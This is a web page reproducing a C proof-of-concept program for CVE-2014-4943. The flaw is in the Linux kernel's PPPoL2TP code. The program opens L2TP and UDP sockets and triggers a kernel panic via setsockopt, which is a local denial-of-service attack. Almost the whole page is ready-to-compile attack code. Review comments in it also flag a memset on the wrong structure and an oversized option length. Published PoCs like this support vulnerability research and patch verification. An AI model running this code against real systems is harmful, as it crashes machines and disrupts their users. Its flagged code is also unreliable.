
cve-2014-4943 Linux Kernel D.O.S POC

D 24 February 2015     H 19:06     A Emeric Nasi     C 0 messages


  3. /* ----------------------------------------------------------------------------------------------------
  4.  * cve-2014-4943_poc.c
  5.  *
  6.  * The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the Linux kernel through 3.15.6 allows local users to gain privileges by leveraging data-structure
  7.  * differences between an l2tp socket and an inet socket.
  8.  *
  9.  * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
  10.  * I have tried to exploit this vulnerability and I am sure there is a way (or several) to elevate privileges.
  11.  * There are some kernel structures that can be overwritten, but I didn't manage to find the ultimate trick to at least point back to userland.
  12.  * It seems the people at Immunity found a way using a race condition.
  13.  *
  14.  *
  15.  * Compile with gcc -fno-stack-protector -Wall -o cve-2014-4943_poc cve-2014-4943_poc.c
  16.  *
  17.  * Emeric Nasi - www.sevagas.com
  18.  *-----------------------------------------------------------------------------------------------------*/
  19.  
  20.  
  21.  
  22. /* ----------------------- Includes ----------------------------*/
  23.  
  24. #include <netinet/ip.h>
  25. #include <netinet/in.h>
  26. #include <arpa/inet.h>
  27. #include <netdb.h>
  28. #include <stdio.h>
  29. #include <stdlib.h>
  30. #include <string.h>
  31. #include <unistd.h>
  32. #include <sys/socket.h>
  33. #include <sys/mman.h>
  34. #include <linux/net.h>
  35. #include <linux/udp.h>
  36. #include <linux/if.h>
  37. #include <linux/if_pppox.h>
  38. #include <linux/if_pppol2tp.h>
  39.  
  40.  
  41. /* ----------------------- Definitions ----------------------------*/
  42.  
/* Kernel version range this PoC is aimed at, as stated in the file header
 * ("through 3.15.6"). These macros are informational only: nothing in this
 * file reads them, so they do not gate execution on the running kernel. */
#define TARGET_KERNEL_MIN "3.2.0"
#define TARGET_KERNEL_MAX "3.15.6"
/* Identifier used in the log line prefixes below. */
#define EXPLOIT_NAME "cve-2014-4943"
  46.  
  47.  
  48.  
  49. /* ----------------------- functions ----------------------------*/
  50.  
  51.  
/**
 * Issue an IP-level setsockopt on a PPPoL2TP socket.
 *
 * The file header describes the underlying bug: the IP/UDP setsockopt paths
 * operate on the socket as if it were an inet socket although the object
 * behind an L2TP socket has a different layout. For this POC, IP_OPTIONS is
 * the easiest way to trigger a kernel panic (denial of service only).
 *
 * @param tunnel_fd  A socket created with socket(AF_PPPOX, SOCK_DGRAM,
 *                   PX_PROTO_OL2TP); see main().
 *
 * Failure of setsockopt() is reported with perror() and otherwise ignored;
 * on a patched kernel this is the expected outcome and the function returns
 * normally.
 */
void modifyUDPvalues(int tunnel_fd)
{
/* Extract from kernel code which is vulnerable, here you can see that both udp_setsockopt and ip_setsockopt (on inet_sock) can be used to leverage vulnerability:
 
 int udp_setsockopt(struct sock *sk, int level, int optname,
  char __user *optval, unsigned int optlen)
 {
  if (level == SOL_UDP || level == SOL_UDPLITE)
  return udp_lib_setsockopt(sk, level, optname, optval, optlen,
  udp_push_pending_frames);
  return ip_setsockopt(sk, level, optname, optval, optlen);
 }
*/
 
/* Option payload. NOTE(review): optlen below is 20 while ip_options is a
 * single int, so the kernel is told to copy 16 more bytes than this local
 * occupies; the extra bytes come from whatever follows it on the stack. */
int ip_options = 0x1;
 
if (setsockopt(tunnel_fd, SOL_IP, IP_OPTIONS, &ip_options, 20) == -1)
{
perror("setsockopt (IP_OPTIONS)");
}
}
  77.  
  78.  
/**
 * DOS poc for cve_2014_4943 vulnerability
 *
 * Flow: create two PPPoL2TP sockets and one plain UDP socket, bind the first
 * L2TP socket to the UDP socket as its tunnel, connect a second L2TP socket
 * on the same tunnel id, then call modifyUDPvalues() on the second socket.
 *
 * @return -1 if any socket() call fails (reported via perror); otherwise the
 *         process exits with status 0 via exit(). On a vulnerable kernel the
 *         process is not expected to get that far.
 *
 * Note: connect() failures are only reported, not treated as fatal, so the
 * later steps run regardless. udp_fd is never closed explicitly; it is
 * released when the process exits.
 */
int main()
{
 
int tunnel_fd;
int tunnel_fd2;
int udp_fd;
 
printf("[cve_2014_4943]: Preparing to exploit.\n");
 
/* Create first L2TP socket */
tunnel_fd = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);
if (tunnel_fd < 0)
{
perror("socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP)");
return -1;
}
/* Create second L2TP socket */
tunnel_fd2 = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);
if (tunnel_fd2 < 0)
{
perror("socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP)");
return -1;
}
/* Plain UDP socket that will carry the tunnel (referenced by sax.pppol2tp.fd). */
if ((udp_fd = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
{
perror("cannot create socket");
return -1;
}
 
/* Connect LT2P socket */
struct sockaddr_pppol2tp sax;
 
memset(&sax, 0, sizeof(sax));
sax.sa_family = AF_PPPOX;
sax.sa_protocol = PX_PROTO_OL2TP;
sax.pppol2tp.fd = udp_fd; /* fd of tunnel UDP socket */
/* Peer is loopback:1337; the address only has to be well-formed for connect(). */
sax.pppol2tp.addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);// peer_addr->sin_addr.s_addr;
sax.pppol2tp.addr.sin_port = htons(1337);//peer_addr->sin_port;
sax.pppol2tp.addr.sin_family = AF_INET;
sax.pppol2tp.s_tunnel = 8;//tunnel_id;
sax.pppol2tp.s_session = 0; /* special case: mgmt socket */
sax.pppol2tp.d_tunnel = 0;
sax.pppol2tp.d_session = 0; /* special case: mgmt socket */
 
if(connect(tunnel_fd, (struct sockaddr *)&sax, sizeof(sax) ) < 0 )
{
perror("connect failed");
}
 
/* Connect LT2P socket */
struct sockaddr_pppol2tp sax2;
/* NOTE(review): this memset targets sax (already zeroed above), not sax2,
 * so every sax2 field not assigned below (fd, addr, ...) holds whatever was
 * on the stack. The second connect() therefore sees unspecified values. */
memset(&sax, 0, sizeof(sax2));
sax2.sa_family = AF_PPPOX;
sax2.sa_protocol = PX_PROTO_OL2TP;
sax2.pppol2tp.s_tunnel = 8;//tunnel_id;   /* same tunnel id as the first socket */
sax2.pppol2tp.s_session = 1;
sax2.pppol2tp.d_tunnel = 0;
sax2.pppol2tp.d_session = 1;
 
if(connect(tunnel_fd2, (struct sockaddr *)&sax2, sizeof(sax2) ) < 0 )
{
perror("connect failed");
}
 
 
/*
  * Entering critical part
  */
printf("[cve_2014_4943]: Panic!\n");
 
/* Only the second (session) socket is used; the first call is kept disabled. */
//modifyUDPvalues(tunnel_fd);
modifyUDPvalues(tunnel_fd2);
 
// close opened socket
puts("\n [+] Closing sockets...");
close(tunnel_fd);
close(tunnel_fd2);
 
/* Reached only on a kernel where the setsockopt had no fatal effect. */
exit(0);
}

